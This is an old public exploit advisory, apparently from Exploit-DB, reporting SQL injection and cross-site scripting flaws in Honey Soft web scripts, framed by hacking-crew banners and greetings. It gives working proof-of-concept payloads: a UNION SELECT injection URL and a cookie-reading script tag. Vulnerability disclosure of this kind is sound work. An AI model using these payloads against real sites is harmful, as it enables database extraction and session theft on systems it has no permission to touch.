Honey Soft Web Solution – Multiple Vulnerabilities

  • 作者: **RoAd_KiLlEr**
    日期: 2011-03-28
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/17055/
  • -----------------------------------------------------------------------------------------
     Honey Soft (detail.php?prod_detail=& products.php?catid=) SQL-i/XSS Multiple Vulnerabilities
    +=+=+= /\| || |__________________ _____ +=+=+=
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    +=+=+= /_/\_\|| | |________/|_|\_\ | |_______\_____/_____ +=+=+=
    +=+=+= |_____________________|+=+=+=
    +=+=+=X-n3t - **RoAd_KiLlEr** - The|Denny` - EaglE EyE - The_1nv1s1bl3+=+=+=
    +=+=+=0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= 
    +=+=+= ....::: | ALBANIAN HACKING CREW | :::....2011+=+=+=
    1########################################### 1
    0 I'm **RoAd_KiLlEr**member from 1337 DAY Team 1
    1########################################### 0
    [+]TitleHoney Soft (detail.php?prod_detail=& products.php?catid=) SQL-i/XSS Multiple Vulnerabilities
    [+]Tested on Win Xp Sp 2/3
    [~] Founded by **RoAd_KiLlEr**
    [~] Team: Albanian Hacking Crew
    [~] Contact: sukihack[at]gmail[dot]com 
    [~] Home: http://1337day.com
    [~] Vendor: http://www.honeysoft.net/
    ==========ExPl0iT3d by **RoAd_KiLlEr**==========
    [+] Dork: No DOrk for Lamerz !!
    [ I ].SQL-i Vulnerability
    [+] Description:
    All the web sites that are developed by Honeysoft use the same script.
    But the script is prone to SQL inection.
    Input passed via the "prod_detail" parameter to detail.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    [L!v3 D3m0]: http://www.site.com/detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6--
    [ II ].XSS-Injection Vulnerability
    [+] Description:
    Input passed via the "prod_detail=" parameter to detail.php and via the "products.php?catid=" parameter to products.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
    [Atack Pattern]: "><script>alert(document.cookie)</script>
    [L!v3 D3m0]: http://www.site.com/detail.php?prod_detail="><script>alert(document.cookie)</script>
    [+] TIME TABLE:
    26 March 2011 - Vulnerability discovered.
    26 March 2011 - Vendor Notified.
    26 March 2011 - Sent to vendor all data.
    27 March 2011 - Vendor replied.
    27 March 2011 - Advisory released.
    [!] Albanian Hacking Crew 
    [!] **RoAd_KiLlEr** 
    [!] MaiL: sukihack[at]gmail[dot]com
    [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers 
    [!] Spec Th4nks:r0073r| indoushka | Sid3^effects | MaFFiTeRRoR | All1337day Members | And All My Friendz
    [!] Red n'black i dress eagle on my chest
    It's good to be an ALBANIAN
    Keep my head up high for that flag I die
    Im proud to be an ALBANIAN